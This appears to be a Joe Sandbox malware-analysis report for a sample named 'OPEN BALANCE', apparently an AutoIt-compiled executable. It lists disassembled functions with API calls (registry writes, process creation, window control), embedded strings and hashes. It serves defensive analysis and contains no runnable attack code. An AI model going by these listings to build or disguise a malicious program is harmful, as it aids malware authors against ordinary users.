Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4042927181-0
Opcode ID: fd339ee836a982b080bdac4b34067d8f019da2161454ca50ef6daf9eab59f74e
Instruction ID: 15aae4e18d2cbeef9aca741933fd4d2df60551a75a1ef7be711588d3597e3c0c
Opcode Fuzzy Hash: fd339ee836a982b080bdac4b34067d8f019da2161454ca50ef6daf9eab59f74e
Instruction Fuzzy Hash: 3F714A7290121AEFEF209FA4DC48BAEBBB8FF05311F044216E959F6191DB71A915CF60

Function 008CC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008CC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,008DCC08,00000000,?,00000000,?,?), ref: 008CC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008CC5A4
_wcslen.LIBCMT ref: 008CC5F4
_wcslen.LIBCMT ref: 008CC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 008CC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008CC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008CC84D
RegCloseKey.ADVAPI32(?), ref: 008CC881
RegCloseKey.ADVAPI32(00000000), ref: 008CC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008CC960

Strings

REG_MULTI_SZ, xrefs: 008CC6F5
REG_DWORD, xrefs: 008CC804
REG_SZ, xrefs: 008CC644
REG_EXPAND_SZ, xrefs: 008CC5CD
REG_BINARY, xrefs: 008CC913
REG_QWORD, xrefs: 008CC8C3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: a4267b7cab148305c9ccd22d94d7865a95f7eac1ae8370b77265ab9b0de2c852
Instruction ID: 0c0466c7585fe2100980dd8bce5dfa906d77d7e9eb2c5479a123a9b46054af3a
Opcode Fuzzy Hash: a4267b7cab148305c9ccd22d94d7865a95f7eac1ae8370b77265ab9b0de2c852
Instruction Fuzzy Hash: A71224356042159FDB14DF18C891E2ABBE5FF88714F05885DF88A9B2A2DB31ED41CB82

Function 008D091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008D09C6
_wcslen.LIBCMT ref: 008D0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008D0A54
_wcslen.LIBCMT ref: 008D0A8A
_wcslen.LIBCMT ref: 008D0B06
_wcslen.LIBCMT ref: 008D0B81

Part of subcall function 0085F9F2: _wcslen.LIBCMT ref: 0085F9FD

Part of subcall function 008A2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008A2BFA

Strings

SELECT, xrefs: 008D0D11
ISCHECKED, xrefs: 008D0CE1
GETSELECTED, xrefs: 008D0C4E
EXISTS, xrefs: 008D0B7C, 008D0B97
GETITEMCOUNT, xrefs: 008D0C1E
CHECK, xrefs: 008D0A85, 008D0AA0
GETTOTALCOUNT, xrefs: 008D09F2, 008D0A17
EXPAND, xrefs: 008D0BF8
GETTEXT, xrefs: 008D0C97
UNCHECK, xrefs: 008D0D3E
COLLAPSE, xrefs: 008D0B01, 008D0B1C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: e189fdec3135807b3398aef98ca20acdc6e86f5ea387ed99ea4bbeafa48b4830
Instruction ID: 9c0d6d970b874c0f2a4aa1665de8bb34c37a97ded802c4d31ef7a584bbf8b5f9
Opcode Fuzzy Hash: e189fdec3135807b3398aef98ca20acdc6e86f5ea387ed99ea4bbeafa48b4830
Instruction Fuzzy Hash: 16E147316087159FC714DF28C450A2AB7E2FF98318F158A5AF896DB3A2D731ED45CB82

Function 008CC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,008CB6AE,?,?), ref: 008CC9B5
_wcslen.LIBCMT ref: 008CC9F1
_wcslen.LIBCMT ref: 008CCA68
_wcslen.LIBCMT ref: 008CCA9E
_wcslen.LIBCMT ref: 008CCAF9
_wcslen.LIBCMT ref: 008CCB2F
_wcslen.LIBCMT ref: 008CCB7F

Strings

HKU, xrefs: 008CCBF0
HKEY_CURRENT_CONFIG, xrefs: 008CCB79, 008CCB7E
HKEY_USERS, xrefs: 008CCBDF
HKEY_CURRENT_USER, xrefs: 008CCBBD
HKCR, xrefs: 008CCB29, 008CCB2E
HKCC, xrefs: 008CCBAC
HKEY_CLASSES_ROOT, xrefs: 008CCAF3, 008CCAF8
HKLM, xrefs: 008CCA98, 008CCA9D
HKCU, xrefs: 008CCBCE
HKEY_LOCAL_MACHINE, xrefs: 008CCA62, 008CCA67

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 0ae85d4efe23fc10e9dcdc70e7028a959eca93879f5654048f2cca341b7078b6
Instruction ID: 709b7916060d5be8334e4a05702fc79d3ebba2e634ff13e8993c484cdf7f488a
Opcode Fuzzy Hash: 0ae85d4efe23fc10e9dcdc70e7028a959eca93879f5654048f2cca341b7078b6
Instruction Fuzzy Hash: 3371D272A0052A8BCB20DEBC8941FBE77B1FB60764F15052CF86AE7285E631DD45C3A1

Function 008D833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008D835A
_wcslen.LIBCMT ref: 008D836E
_wcslen.LIBCMT ref: 008D8391
_wcslen.LIBCMT ref: 008D83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008D83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008D5BF2), ref: 008D844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008D8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008D84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008D8501
FreeLibrary.KERNEL32(?), ref: 008D850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008D851D
DestroyCursor.USER32(?), ref: 008D852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008D8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008D8555

Strings

.exe, xrefs: 008D8388
.icl, xrefs: 008D8368
.dll, xrefs: 008D83AB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Load$Image_wcslen$LibraryMessageSend$CursorDestroyExtractFreeIcon
String ID: .dll$.exe$.icl
API String ID: 391920613-1154884017
Opcode ID: ca90c7210c0bc36d98ba603df8271a1a9928ae781295ff9ae3dfccaf21add2bc
Instruction ID: ba60f3c493400c09b9c7bb8836d4e5fcb1f8920a4be2c266dddd1fe09e06952d
Opcode Fuzzy Hash: ca90c7210c0bc36d98ba603df8271a1a9928ae781295ff9ae3dfccaf21add2bc
Instruction Fuzzy Hash: 3B619D7194021AFAEB14DF68DC45BBE77A8FB04B21F10460AF915DA2D1DF74A990CBA0

Function 00847778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#OnAutoItStartRegister, xrefs: 00847817
#pragma compile, xrefs: 008477D3
#include, xrefs: 00847847
#include-once, xrefs: 0084782F
#ce, xrefs: 008478ED
', xrefs: 00885169
#comments-end, xrefs: 008478D9
Cannot parse #include, xrefs: 00885279
Unterminated group of comments, xrefs: 0088528C
Bad directive syntax error, xrefs: 0088519A
#cs, xrefs: 00847873, 008478C5
#comments-start, xrefs: 0084785F, 008478B1
#notrayicon, xrefs: 008477E7
", xrefs: 00885153
#requireadmin, xrefs: 008477FF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 27ff1d90fa1a8abe847d2033cc97b9af1c1064b8672b88648106781c8963decb
Instruction ID: 3320eb7a21cc56246116995c63d8491dbd3c6d856d244611c5d72567ff15bca8
Opcode Fuzzy Hash: 27ff1d90fa1a8abe847d2033cc97b9af1c1064b8672b88648106781c8963decb
Instruction Fuzzy Hash: D8810671A44209BBDB20BF68DC42FAE77A8FF15300F054025F905EB292EB75DA15C792

Function 008A5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 008A5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008A5A40
SetWindowTextW.USER32(?,?), ref: 008A5A57
GetDlgItem.USER32(?,000003EA), ref: 008A5A6C
SetWindowTextW.USER32(00000000,?), ref: 008A5A72
GetDlgItem.USER32(?,000003E9), ref: 008A5A82
SetWindowTextW.USER32(00000000,?), ref: 008A5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008A5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008A5AC3
GetWindowRect.USER32(?,?), ref: 008A5ACC
_wcslen.LIBCMT ref: 008A5B33
SetWindowTextW.USER32(?,?), ref: 008A5B6F
GetDesktopWindow.USER32 ref: 008A5B75
GetWindowRect.USER32(00000000), ref: 008A5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008A5BD3
GetClientRect.USER32(?,?), ref: 008A5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 008A5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008A5C2F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 6fd3821fc1b8ecb84ec816e3334d0cc2255e087e8a0ca08d724df2810db4eafe
Instruction ID: a88f5c5ae81fad0ca22067ed70fc327c319fcbc552904f709a7bf4fc3a8b1475
Opcode Fuzzy Hash: 6fd3821fc1b8ecb84ec816e3334d0cc2255e087e8a0ca08d724df2810db4eafe
Instruction Fuzzy Hash: 88717031A00B09AFEB20DFA8CD45B6EBBF5FF48715F104619E142E29A0D775E945CB60

Function 008600C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008600C6

Part of subcall function 008600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0091070C,00000FA0,226B12C4,?,?,?,?,008823B3,000000FF), ref: 0086011C
Part of subcall function 008600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008823B3,000000FF), ref: 00860127
Part of subcall function 008600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008823B3,000000FF), ref: 00860138
Part of subcall function 008600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0086014E
Part of subcall function 008600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0086015C
Part of subcall function 008600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0086016A
Part of subcall function 008600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00860195
Part of subcall function 008600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008601A0

___scrt_fastfail.LIBCMT ref: 008600E7

Part of subcall function 008600A3: __onexit.LIBCMT ref: 008600A9

Strings

SleepConditionVariableCS, xrefs: 00860154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00860122
kernel32.dll, xrefs: 00860133
InitializeConditionVariable, xrefs: 00860148
WakeAllConditionVariable, xrefs: 00860162

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 155d9f916ac731dd797596d8f3a2ed44c08da608f7f777130e4d2811dbcad476
Instruction ID: 8aa1bec14edf87875d1de470adae013c7a7937babd60009337d3690ed9ce67e9
Opcode Fuzzy Hash: 155d9f916ac731dd797596d8f3a2ed44c08da608f7f777130e4d2811dbcad476
Instruction Fuzzy Hash: 1E2129326457156BDB105BA8AC06B6B33A4FB46B51F01023BF902D73D2DFA49800CE95

Function 008A30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008A318D
_wcslen.LIBCMT ref: 008A31F8

Strings

TEXT, xrefs: 008A347C
INSTANCE, xrefs: 008A3453
CLASSNN, xrefs: 008A31F3, 008A3204
CLASS, xrefs: 008A3188, 008A31A5
NAME, xrefs: 008A3335, 008A3346
REGEXPCLASS, xrefs: 008A3255, 008A3266

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: fa19cdbf77a5a06c016e11123575ea01610b319e43b3a00986807c6e2b429cbe
Instruction ID: e45f04492ddc81c6c5621533bca50996cb41bc5b068137697880ee412f21b350
Opcode Fuzzy Hash: fa19cdbf77a5a06c016e11123575ea01610b319e43b3a00986807c6e2b429cbe
Instruction Fuzzy Hash: 23E1E531A00616ABEB18DFB8C4517EEFBB0FF56710F158129F456E7640EB30AE858B90

Function 008B44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,008DCC08), ref: 008B4527
_wcslen.LIBCMT ref: 008B453B
_wcslen.LIBCMT ref: 008B4599
_wcslen.LIBCMT ref: 008B45F4
_wcslen.LIBCMT ref: 008B463F
_wcslen.LIBCMT ref: 008B46A7

Part of subcall function 0085F9F2: _wcslen.LIBCMT ref: 0085F9FD

GetDriveTypeW.KERNEL32(?,00906BF0,00000061), ref: 008B4743

Strings

all, xrefs: 008B4531, 008B4536
fixed, xrefs: 008B4635, 008B463A
ramdisk, xrefs: 008B46F1
unknown, xrefs: 008B4708
cdrom, xrefs: 008B458F, 008B4594
removable, xrefs: 008B45EA, 008B45EF
network, xrefs: 008B469D, 008B46A2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: abb91193e849df4798de52647ef93c1333a455b57a0714427b6030d85b580df6
Instruction ID: cec7525f024e3e710126a6120fe9e85a60164f0904d61edfcb8502abb2e93e7f
Opcode Fuzzy Hash: abb91193e849df4798de52647ef93c1333a455b57a0714427b6030d85b580df6
Instruction Fuzzy Hash: 04B1C0716083029FC720DF28C892AAEB7E5FFA6764F50591DF496C7392EB30D844CA52

Function 008CAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008CB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008CB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008CB1D4
_wcslen.LIBCMT ref: 008CB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008CB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008CB236
_wcslen.LIBCMT ref: 008CB332

Part of subcall function 008B05A7: GetStdHandle.KERNEL32(000000F6), ref: 008B05C6

_wcslen.LIBCMT ref: 008CB34B
_wcslen.LIBCMT ref: 008CB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008CB3B6
GetLastError.KERNEL32(00000000), ref: 008CB407
CloseHandle.KERNEL32(?), ref: 008CB439
CloseHandle.KERNEL32(00000000), ref: 008CB44A
CloseHandle.KERNEL32(00000000), ref: 008CB45C
CloseHandle.KERNEL32(00000000), ref: 008CB46E
CloseHandle.KERNEL32(?), ref: 008CB4E3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 57a740139dbb415e566499582211905088319c745d5b44dd46f147fbe668b896
Instruction ID: d21feaae6e6c40cb67a0a7869df80d8de42828e3240e3d7bb2f079d5d20fbdef
Opcode Fuzzy Hash: 57a740139dbb415e566499582211905088319c745d5b44dd46f147fbe668b896
Instruction Fuzzy Hash: 90F169315086449FC724EF28C892B6EBBE5FF85314F14895DF8999B2A2DB31EC44CB52

Function 0084326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00911990), ref: 00882F8D
GetMenuItemCount.USER32(00911990), ref: 0088303D
GetCursorPos.USER32(?), ref: 00883081
SetForegroundWindow.USER32(00000000), ref: 0088308A
TrackPopupMenuEx.USER32(00911990,00000000,?,00000000,00000000,00000000), ref: 0088309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008830A9

Strings

0, xrefs: 0084327D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 71805d7224e7588b5e49d8a22ee9dd3220269805b72347b37b793b924fb97cf5
Instruction ID: 282106f0cadb7f4206d44080dae46ee2dd444e6941da3eb83038697c3a16b970
Opcode Fuzzy Hash: 71805d7224e7588b5e49d8a22ee9dd3220269805b72347b37b793b924fb97cf5
Instruction Fuzzy Hash: 7371197064021ABEEB319F28DC49F9ABF64FF05324F204316F624E61E1CBB1A910DB51

Function 008D6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 008D6DEB

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008D6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008D6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008D6E94
DestroyWindow.USER32(?), ref: 008D6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00840000,00000000), ref: 008D6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008D6EFD
GetDesktopWindow.USER32 ref: 008D6F16
GetWindowRect.USER32(00000000), ref: 008D6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008D6F35
